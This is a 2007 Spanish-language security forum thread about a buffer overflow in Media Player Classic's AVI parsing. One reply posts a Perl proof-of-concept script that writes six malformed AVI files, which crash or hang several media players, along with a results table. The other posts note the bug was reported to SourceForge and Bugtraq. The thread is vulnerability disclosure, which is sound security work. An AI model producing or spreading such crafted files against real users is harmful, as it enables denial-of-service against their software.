elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 10:35  


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Ejecución de código en Media Player Classic (.AVI)		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ejecución de código en Media Player Classic (.AVI)  (Leído 2,448 veces)
YaTaMaS
Colaborador
***
Desconectado Desconectado

Mensajes: 4.636


Nada es seguro y todo es posible


Ver Perfil WWW
Ejecución de código en Media Player Classic (.AVI)
« en: 14 Septiembre 2007, 19:49 »
Se ha reportado una vulnerabilidad en Media Player Classic, la cuál podría ser explotada por usuarios maliciosos para comprometer un sistema vulnerable.

Media Player Classic es un reproductor gratuito que imita en apariencia al clásico reproductor multimedia de Windows 98, pero con muchas más opciones, menor gasto de recursos que otros reproductores, y con la capacidad de reproducir (con los códecs necesarios) prácticamente todos los formatos conocidos.

La vulnerabilidad es provocada por un error en la validación de entrada al procesar archivos .AVI, que ocasiona un desbordamiento de búfer. Un atacante puede crear un archivo malicioso para provocar la ejecución de código, tomando el control del equipo.

La vulnerabilidad afecta a la versión 6.4.9.0 (última a la fecha de esta alerta) y posiblemente a versiones anteriores.

Se recomienda no abrir archivos .AVI no solicitados, ni tampoco aquellos descargados de sitios desconocidos.


Media Player Classic AVI File Processing Buffer Overflow
http://secunia.com/advisories/26806/

Media Player Classic
http://www.free-codecs.com/download/Media_Player_Classic.htm

(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com
En línea
Campañas de Posicionamiento Web desde 40€/mes.
Envíame un MP si estás interesado ;)

Semitorre Tacens Sagitta Lux + Intel Q6600 2,4Ghz @ 3,2 + Zalman 8700 Led Quad Core + Placa Asus P5KC
+ 2GB DDR2 800 Kingston HiperX + ATI Sapphire 512MB HD3870 + Disco 500GB Sata2 Seagate 7200.11 32MB
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Ejecución de código en Media Player Classic (.AVI)
« Respuesta #1 en: 15 Septiembre 2007, 01:56 »
Código
#!/usr/bin/perl
 
# Denial Of Service discovered by yeikos - yeikos (at) gmail (dot) com
 
# [*] Divide by Zero in Media Player Classic <= 6.4.9.1 (video0.avi)
# [*] Exception caught at 0064023b div ecx
# [*] EAX:00000000 EBX:00000000 ECX:00000000 EDX:00000000
# [*] ESI:00e75230 EDI:00000000 ESP:0134f150 EBP:00000000
 
 
# Updated results of table from http://secunia.com/advisories/26806/
 
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
# | produce |  video0   |  video1   |  video2   |  video3   |  video4   |  video5  |
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
# | wmp     |  ok       |  ok       |  ok       |   ok      |   ok      |  ok      |  
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
# | mplayer |  ok       |  ok       |  ok       |  HO/CRASH |   ok      |  ok      |
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
# | mpc     |  CRASH    |  HO       |  HO       |  HO       |   ok      |  ok      |
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
# |KMPlayer |  ok       | RAISE CPU | RAISE CPU | RAISE CPU |   ok      |  ok      |
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
# | mympc   |  ok       |  HO       |  HO       |  HO       |   ok      |  ok      |
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
# |StormPlay|  N/A      |  HO       |  HO       |  HO       |   ok      |  ok      |
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
# | xplayer |  ok       |  ok       |  ok       |   ok      |   ok      |  ok      |  
# +---------+-----------+-----------+-----------+-----------+-----------+----------+
 
my $folder = "videos";
 
@file = ("",
"\x69\x6E\x64\x78\xFF\xFF\xFF\xFF\x01\x00\x64\x73\x20\x00\x00\x10",
"\x69\x6E\x64\x78\x00\xFF\xFF\xFF\xFF\xFF\x64\x73\xFF\xFF\xFF\xFF",
"\x69\x6E\x64\x78\x00\xFF\xFF\xFF\x01\x11\x64\x73\x20\x00\x00\x10",
"\x69\x6E\x64\x78\x00\xFF\x00\x00\x01\x00\x64\x73\x20\x00\x00\x10",
"\x69\x6E\x64\x78\x00\xFF\x00\x00\x04\x00\x64\x73\x10\x00\x00\x40");
 
mkdir $folder;
 
for ($i=0;$i<=$#file;$i++) {
	open(MyFile," > $folder\\video$i.avi") or die "Opening error in file $i.\n";
	print {MyFile} $file[$i];
	close(MyFile);
}
 
# Referer: http://foro.elhacker.net/index.php/topic,180521.0.html


        Media Player Classic 6.4.9.1 (2007-09-03): http://www.free-codecs.com/Media_Player_Classic_download.htm
« Última modificación: 15 Septiembre 2007, 01:58 por yeikos » En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Ejecución de código en Media Player Classic (.AVI)
« Respuesta #2 en: 17 Septiembre 2007, 15:25 »
Reporté anoche el fallo en los foros de SourceForge, aún a la espera de una contestación...

Citar
http://sourceforge.net/forum/forum.php?thread_id=1824543&forum_id=281014
En línea
YaTaMaS
Colaborador
***
Desconectado Desconectado

Mensajes: 4.636


Nada es seguro y todo es posible


Ver Perfil WWW
Re: Ejecución de código en Media Player Classic (.AVI)
« Respuesta #3 en: 17 Septiembre 2007, 19:55 »

Veremos que se cuentan,
el código de la vulnerabilidad funka a la perfección :P



Salu2!
En línea
Campañas de Posicionamiento Web desde 40€/mes.
Envíame un MP si estás interesado ;)

Semitorre Tacens Sagitta Lux + Intel Q6600 2,4Ghz @ 3,2 + Zalman 8700 Led Quad Core + Placa Asus P5KC
+ 2GB DDR2 800 Kingston HiperX + ATI Sapphire 512MB HD3870 + Disco 500GB Sata2 Seagate 7200.11 32MB
Rozor

Desconectado Desconectado

Mensajes: 269


As I Walk Through The Valley Of The Shadow Of Dead


Ver Perfil WWW
Re: Ejecución de código en Media Player Classic (.AVI)
« Respuesta #4 en: 17 Septiembre 2007, 22:13 »
@file = ("",
"\x69\x6E\x64\x78\xFF\xFF\xFF\xFF\x01\x00\x64\x73\x20\x00\x00\x10",
"\x69\x6E\x64\x78\x00\xFF\xFF\xFF\xFF\xFF\x64\x73\xFF\xFF\xFF\xFF",
"\x69\x6E\x64\x78\x00\xFF\xFF\xFF\x01\x11\x64\x73\x20\x00\x00\x10",
"\x69\x6E\x64\x78\x00\xFF\x00\x00\x01\x00\x64\x73\x20\x00\x00\x10",
"\x69\x6E\x64\x78\x00\xFF\x00\x00\x04\x00\x64\x73\x10\x00\x00\x40");




Como se generan avi's o cuales son los opcodes de su cabezera?
En línea
out in the streets they call it murder....
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Ejecución de código en Media Player Classic (.AVI)
« Respuesta #5 en: 17 Septiembre 2007, 22:35 »
Utiliza PERL para interpretar el código que escribí, de este modo se generarán 6 vídeos diferentes, en los que cada uno explotará la vulnerabilidad del reproductor que se muestra en la tabla de arriba.
En línea
yeikos


Desconectado Desconectado

Mensajes: 1.424



Ver Perfil
Re: Ejecución de código en Media Player Classic (.AVI)
« Respuesta #6 en: 18 Septiembre 2007, 14:31 »
También se encuentra en el BugTraq de SecurityFocus...

Citar
http://www.securityfocus.com/archive/1/479697/30/0/threaded
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Media Player Classic Home Cinema 1.5.0.2827: nueva versión del popular ....
Noticias 		wolfbcn 0 1,021 Último mensaje 8 Febrero 2011, 02:43
por wolfbcn
Ejecución de código en VLC Player
Noticias 		wolfbcn 1 1,445 Último mensaje 27 Marzo 2011, 22:42
por Guerrerohgp
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines